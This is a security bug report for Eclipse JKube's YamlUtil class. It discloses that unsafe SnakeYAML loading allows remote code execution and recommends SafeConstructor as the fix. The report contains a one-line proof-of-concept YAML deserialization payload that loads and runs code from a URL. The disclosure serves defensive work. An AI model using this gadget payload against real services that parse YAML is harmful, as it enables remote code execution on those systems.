Bug 561261 - jkube-kit - insecure yaml load leading to RCE (CWE-502)

[manusa]

Description

Proxy issue for https://bugs.eclipse.org/bugs/show_bug.cgi?id=561261

From the Security Team Inbox:

--
https://github.com/eclipse/jkube/blob/master/jkube-kit/common/src/main/java/org/eclipse/jkube/kit/common/util/YamlUtil.java#L112 uses insecure way to construct Yaml Object leading to remote code execution. Here is a sample code which would invoke malicious code hosted in localhost:9000.

String code = "maps: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:9000/\"]]]]";
YamlUtil.getPropertiesFromYamlString(code);

Please refer SafeConstructor() and https://bitbucket.org/asomov/snakeyaml/wiki/Documentation#markdown-header-restrict-classes-to-be-loaded on using the api securely.

Reference: https://cwe.mitre.org/data/definitions/502.html
--

There's help for managing vulnerabilities in the handbook.

https://www.eclipse.org/projects/handbook/#vulnerability